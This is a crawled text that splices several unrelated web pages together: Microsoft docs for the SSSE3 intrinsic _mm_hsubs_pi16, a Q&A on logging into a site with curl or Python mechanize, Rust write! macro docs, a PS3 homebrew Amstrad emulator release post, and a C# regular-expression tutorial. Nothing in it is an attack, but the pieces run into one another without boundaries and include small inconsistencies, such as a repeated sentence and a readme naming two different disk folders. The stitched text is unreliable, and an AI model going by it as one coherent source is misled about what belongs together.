Note that this is not used with current hotplug packages, however. | https://bugzilla.redhat.com/show_bug.cgi?id=91677 | CC-MAIN-2017-43 | refinedweb | 266 | 64.91 |
_mm_hsubs_pi16
Microsoft Specific
Emits the Supplemental Streaming SIMD Extensions 3 (SSSE3) instruction phsubsw. This instruction computes the saturated differences between adjacent pairs of elements in two 64-bit parameters.
A 64-bit value that contains four 16-bit signed integers. Each integer is the difference between adjacent pairs of elements in the input parameters.
The result can be expressed with the following equations:

r0 := SATURATE_16(a0 - a1);
r1 := SATURATE_16(a2 - a3);
r2 := SATURATE_16(b0 - b1);
r3 := SATURATE_16(b2 - b3);
r0-r3, a0-a3, b0-b3 are the sequentially ordered 16-bit components of return value r and parameters a and b, each comprising 64 bits, with r0, a0, b0 denoting the least significant 16 bits.
SATURATE_16(x) is defined as ((x > 32767) ? 32767 : ((x < -32768) ? -32768 : x))
Before you use this intrinsic, software must ensure that the processor supports the instruction.
#include <stdio.h>
#include <tmmintrin.h>

int main()
{
    __m64 a, b;

    a.m64_i16[0] = 32;
    a.m64_i16[1] = 32;
    a.m64_i16[2] = 4096;
    a.m64_i16[3] = -4096;

    b.m64_i16[0] = 32700;
    b.m64_i16[1] = -1000;
    b.m64_i16[2] = -30000;
    b.m64_i16[3] = 30000;

    __m64 res = _mm_hsubs_pi16(a, b);

    printf_s("Original a:\t%6d\t%6d\t%6d\t%6d\nOriginal b:\t%6d\t%6d\t%6d\t%6d\n",
             a.m64_i16[0], a.m64_i16[1], a.m64_i16[2], a.m64_i16[3],
             b.m64_i16[0], b.m64_i16[1], b.m64_i16[2], b.m64_i16[3]);
    printf_s("Result res:\t%6d\t%6d\t%6d\t%6d\n",
             res.m64_i16[0], res.m64_i16[1], res.m64_i16[2], res.m64_i16[3]);

    _mm_empty();
    return 0;
}
This is tricky. I want to use curl, wget or any other tool to log in to an SSL website which provides a login form. Then I want to visit several links within that domain and fetch certain images.
curl -c /tmp/cookie.txt -d "login=username&password=passw&send=submit"
Use the cookie later with
curl -b /tmp/cookie.txt
The trick was that you have to submit the credentials to the action= address of the HTML form.
<img src="URI/servlet/manyParametersWith?And=AndLotsOf&">
Try using Python and mechanize (available for Perl too). You can do something like this:
import mechanize
br=mechanize.Browser()
br.open('')
br.select_form(nr=0) #check yoursite forms to match the correct number
br['Username']='Username' #use the proper input type=text name
br['Password']='Password' #use the proper input type=password name
br.submit()
br.retrieve('','yourfavoritepage.html')
OK, the only possibility to write the image is to display it in a browser, e.g. echo it via PHP and then write it out to disk via PHP. Some users reported that might work.
Macro core::write (stable since Rust 1.0.0)
Write formatted data into a buffer.
This macro accepts a format string, a list of arguments, and a 'writer'. Arguments will be formatted according to the specified format string and the result will be passed to the writer.
The writer may be any value with a write_fmt method; generally this comes from an implementation of either the std::fmt::Write or the std::io::Write trait. The macro returns whatever the write_fmt method returns; commonly a std::fmt::Result, or an io::Result.

See std::fmt for more information on the format string syntax.
Examples
use std::io::Write;

let mut w = Vec::new();
write!(&mut w, "test").unwrap();
write!(&mut w, "formatted {}", "arguments").unwrap();

assert_eq!(w, b"testformatted arguments");
A module can import both std::fmt::Write and std::io::Write and call write! on objects implementing either, as objects do not typically implement both. However, the module must import the traits qualified so their names do not conflict:
use std::fmt::Write as FmtWrite;
use std::io::Write as IoWrite;

let mut s = String::new();
let mut v = Vec::new();
write!(&mut s, "{} {}", "abc", 123).unwrap(); // uses fmt::Write::write_fmt
write!(&mut v, "s = {:?}", s).unwrap(); // uses io::Write::write_fmt
assert_eq!(v, b"s = \"abc 123\"");
Not long ago PlayStation 3 homebrew developer Rtype released a Hatari v1.6.1 DBG Atari Emulator PS3 port, and today he is back with a Caprice32 4.1.0 DBG emulator port for PS3 as well.
For those unaware, Caprice32 is a software emulator of the Amstrad CPC 8-bit home computer series. The emulator faithfully imitates the CPC464, CPC664, and CPC6128 models.
Download: [Register or Login to view links] / [Register or Login to view links]
To quote:
(As you can play some old good games with this version, but be sure to know what exactly an Amstrad CPC computer is before you launch it on the PS3.) So ...
What?: A quick port of caprice32-4.1.0 to ps3 using PSL1GHTV2 / SDL.
Why? : It was the first computer i own.
Who? : Rtype
This is just an old Caprice32 version (4.1.0) for PS3 built with the PSL1GHT V2 SDK. I don't have much free time to work on it, so don't expect too much.
You will find binary in release.zip & source code (for those who want to look at) in capold-4.1.0.zip be sure to read READMEPS3.TXT before install.
Original project from Ulrich Doewich at Caprice32 | Free System Administration software downloads at [Register or Login to view links], so credit goes to him.
Finally, from the included ReadMe file:
A Lame Caprice32-4.1.0 DBG release for PS3.
What?: A quick port of caprice32-4.1.0 to ps3 using PSL1GHTV2.
Why? : It was the first computer i own.
Who? : Rtype
Caprice32-4.1.0 PS3/PSL1GHTV2
Modified source code for PS3 to compile and run on the sony PS3 with the PSL1GHTV2 SDK. You can download the caprice32 original source code here: [Register or Login to view links]
As you can see, this is the minimal hack to the original source code to compile and run under the PS3 with PSL1GHTV2 sdk.
All the credit of the caprice32 Emulator to Ulrich Doewich at [Register or Login to view links]
Also i use the psg.c & 6128.h & amsdos.h files from wiituka (author: dantoine) at [Register or Login to view links]
Know Problems:
- Works with a real keyboard or you have to use my lame virtual keyboard
- Virtual kbd is weak & wrong ...
- Some pb with SDL1.2 caprice32 code (ex: code Keysym 1.2 different from 1.3) so i make quick dirty hack not all the keys are working ...
- Sound not working as expected ,no time for now to look at the pb.
- I've quickly coded a lame disk browser so only file with ext .dsk or .DSK (no more than 400) are showing the files are not sorting, and the browser/browsing is bad
- I've not tested very well, just few games , so maybe other pb around ...
Sorry for all this problems but i hope you enjoy anyway somes old good games.
Quick Install & Start:
- Create somes dir in /dev_hdd0/ : /dev_hdd0/HOMEBREW and /dev_hdd0/HOMEBREW/amstrad
- Put some cpc dsk (.dsk or .DSK , no zip) in : /dev_hdd0/HOMEBREW/ST/
- Install the pkg.
- In emulator press L1 to load a dsk, then L2 for execute a CAT on dsk and see the name of executable, then L3 for write a RUN" and finally use kbd to write the name of executable and press return (or CIRCLE)
ex:
1) L1-> load arkanoid.dsk
2) L2-> cat
Drive A: user 0
ARKANOID. * 8k
133K free
3) L3-> run"
4) complete with kdb(real or virtual ) to have :
run"ARKANOID
5) Press ENTER from kbd or Press CIRCLE to load game
6) Optional Press R3 to enable DBG and SOUND (beware Sound not working as expected)
INGAME CONTROLS :
Works with a real keyboard or use the lame wirtual keyboard .
1) In game
on ps3 joystick:
LEFTSTICK= CPC JOY MOVE | UP/DOWN/RIGHT/LEFT
BCROSS= Button1 | X
BSQUARE= button2 | Z
on real kbd:
as expected (hum not really)
2) In the file dsk browser
LEFTSTICK_UP > scroll up
LEFTSTICK_DOWN > scroll down
LEFTSTICK_LEFT > page up
LEFTSTICK_RIGHT > page down
BCROSS= load
BSQUARE= cancel
3) System key
on real kbd:
F5 reset
F6 loaddrive
F10 exit
on ps3 joystick:
L1 load dsk browser
R1 show virtual kbd
R2 valid a virtual key
L2 type cat + return
L3 type run"
R3 toggle DBG flag , IF DGB ON > show fps and sound on
TRIANGLE type DEL
CIRCLE type ENTER
START reset
SELECT exit
TODO :
- add sna load/save
- update to 4.2.0 source code
- fix sound
- fix keyboard
- fix browser
Credit:
Special thanks to :
Ulrich Doewich (Emulator author), dantoine for wiituka (i use psg.c & 6128.h amsdos.h from wiituka), All PS3DEV, KaKaRoTo (very big thanks for your works), Hermes, Oopo, Deroad... Bonjour chez vous!
Unit Testing, Agile Development, Architecture, Team System & .NET - By Roy Osherove
Note: This is part 1 of a series of articles:
Part 2 - Practical Parsing Using Groups in Regular Expressions
In this article I’ll demonstrate the use of the following:
· Using the System.Text.RegularExpressions Namespace classes for text parsing
· Using System.IO Namespace classes to read text files
· Expresso – A tool for testing Regular Expressions
Regular expressions (a.k.a “Regex”) are a very powerful text parsing language used widely in many parts of the technology industry.
Their main use is to find a particular pattern within a given string that matches whatever rules were expressed using this language.
In software applications, we will usually test whether the Regex found a match for a pattern with the rules we defined and, based on the success of the search, perform certain actions such as validating an email address or finding HTTP links in a web page.

The Regex language can be used for both simple searches as well as for more complicated patterns, such as finding all words in a given string that appear more than once within the given text. Another use for Regex is to replace the string matching the pattern with another string (for example, making all lowercase words uppercase, or replacing all “Five” with “5”).
A simple example would be to find a match for a pattern fitting an email address.
Let’s take a look at how an email address is built. Taking Royo@SomeWhere.com as an example:
We know there is a pattern here, since we know there will always be at least 5 parts:
- A string
- A “@” character
- Another string
- A “.”
- Another string
If you were to receive a string and determine whether it is a legitimate email address you would have several options:
· Parse the string using cumbersome code for the existence of specific characters (which we mentioned above)
o You need to check for hardcoded characters in your given string using String.IndexOf() and that sort of thing
o You need to code lots of lines of code to perform complicated pattern searching (email pattern is very simple yet would take a pretty complicated “If” structure to apply correctly
· Use the Regex Class found in the System.Text.RegularExpressions Namespace to check for an email pattern match
o 2 lines of code
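That two-line claim looks roughly like the following sketch (a hypothetical usage example written for illustration, using the email pattern developed later in this article):

```csharp
// Hypothetical two-line validation with the pattern from this article.
string candidate = "royo@somewhere.com";
bool isValid = System.Text.RegularExpressions.Regex.IsMatch(
    candidate, @"\w+@\w+\.\w+((\.\w+)*)?");
```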
In order to practice the following example, you will need to download and install Expresso – A regular expression testing tool and much more. After you have installed it fire it up.
The main screen is divided into 3 main sections :
- The Regular expression input pane(upper part)
This is where we try out different expressions and test for the parsing outcome in the output pane
- The Data Input Pane(Lower Left)
The data to be parsed and tested. This is where we enter our sample data.
- The Output Pane (Lower right)
The outcome of the Regex parsing engine.
Expresso starts up with a predefined sample expression already inside its expression pane.
You can tell by the "# Dates" inside that this expression deals with parsing for dates inside text.
It already has some sample data filled in as well. To see what the parsing results look like, you can just click "Find Matches" button and see what happens.
The output pane is filled with all the strings that matched the particular pattern in the expression pane.
Notice that the results are also hierarchical, and can be expanded. This is another feature of Regex , which allows you to express groups to be captured and referred to by name, within an expression. But enough with this sample, since it is a bit to complicated for starters.
Let's do an easier sample, and I'll explain from the start. But enough with this sample, since it is a bit too complicated for starters.
Say we have some lines of text that we need to parse and retrieve email addresses from.
[Paste the following into the data pane in expresso]
This is a piece of text. It represents some email addresses.
For example royo@somewhere.com is an email address. Another one could be
Perhaps just junk@address.co.au or maybe it's @234.34.23.com.
For conclusion, here are some more junk email addresses. @. something@.
@somewhere. @.com something@.com @somwehre.com
This is the end of the text to be pasted into expresso.
Here’s a pattern to find a match for an email address using regular expressions :
\w*@\w*\.\w*((\.\w*)*)?
Like almost anything in languages, this can be expressed in more then one way, since the language itself contains many possibilities,
but let’s dissect this expression:
“\w” – An escape character meaning “characters usually found in words”.
This means alpha numeric characters, but excludes spaces, punctuation marks and tabs.
Basically, anything that could be considered as being a non-word character is excluded.
“*” – The asterisk sign means “0 or more instances of” and operates on the expression to the left of it.
Thus, “\w*” means “match zero or more occurrences of any word-like character”
“@” – Match one instance of the character “@”
“\w*” - “match zero or more occurrences of any word-like character”
“\.” – Match one instance of the dot character (this requires an escape slash since “.” Is a reserved operator in the regex language)
“()” – Groups what is inside the round brackets into a logical group
(\.\w*)* - Match zero or more instances of a dot followed by a zero or more instances of any word-like character
()? – optional group – Match this if it appears in the text
According to the last 3 explanations here’s an overall explanation to the last part of the expression:
((\.\w*)*)? – means there might be zero or more instance of a dot followed by a word (“.something.anotherthing.bla” would be matched)
To conclude, here’s the description of this expression in whole:
Match any word followed by a “@”, followed by any word, followed by a dot, followed by any word, followed by zero or more instances of a dot and a word after it.
Paste the pattern mentioned above into the expression pane of expresso. Once you've done that, click the "find matches" button.
You can see in the output pane, that the Regex engine recovered only part of the data that appears in the data pane. It returned only strings which match the expression that was given.
Can you see a problem yet?
Can you find a logical problem with this expression?
These strings were matched as well, although they are not legitimate email addresses.
@.
something@.
@somewhere.
@.com
something@.com
@somwehre.com
The problem is we tested for zero or more instances of a character, so these strings were accepted as well. We needed to specify “1 or more instances of” instead.
This is easily expressed using the “+” operator instead of the "*" operator.
Try to fix the expression yourself and hit "Find Matches again"..
Here’s the fixed expression to catch only valid instances
\w+@\w+\.\w+((\.\w+)*)?
This will catch only the two legitimate email addresses.
As you can see, It's pretty easy to work with regular expressions, once you know the syntax.
A table of syntax for Regex can be found here.
Here's the source code listing for a simple form, which reads a text file named "data.txt" found in its directory.

Data.txt contains the same text as mentioned above, which you have put in the "data" pane of Expresso.
The form reads the file, then uses the Regex class to get a MatchCollection object, which is a collection of Match Objects.
Each Match Object contains the value of the string that was parsed.
using System;
using System.Drawing;
using System.Collections;
using System.ComponentModel;
using System.Windows.Forms;
using System.Data;
//we add the following import statements
using System.Text.RegularExpressions;
using System.IO;
using System.Text;
.
//This is the method we will call on form load
private void ParseData()
{
listBox1.Items.Clear();
//Read the data.txt file to parse for emails
string data = GetDataFromFile();
//the pattern used to parse for emails
//notice the '@' at the start so that backslashes are not
//treated as escape sequences
string expression = @"\w+@\w+\.\w+((\.\w+)*)?";
//get a collection of successfull matches
//from Regex using the specified pattern on the input data
MatchCollection matches = Regex.Matches(data,expression);
//Iterate through the matches, adding them to the list box
foreach(Match SingleMatch in matches)
{
listBox1.Items.Add(SingleMatch.Value);
}
}
private string GetDataFromFile()
{
//Use the Path Class to generate FIle paths from a given folder and a file name
string filename = Path.Combine(Application.StartupPath,"data.txt");
//open a text file for reading
StreamReader reader = File.OpenText(filename);
//get all the text in the file
string ret = reader.ReadToEnd();
//dismiss the file handle
reader.Close();
//return the text in the file
return ret;
}
Using regular expressions and the Regex object is very simple, and very powerful. Once you learn it, you'll use it all over the place: in search dialogs, in code, and sometimes even in search engines. In future articles I will demonstrate more elaborate uses of regular expressions, and how they fit in an overall practical solution.
(You can find more on the syntax of Regex here.)
The link to Expresso is broken. Can you update it please?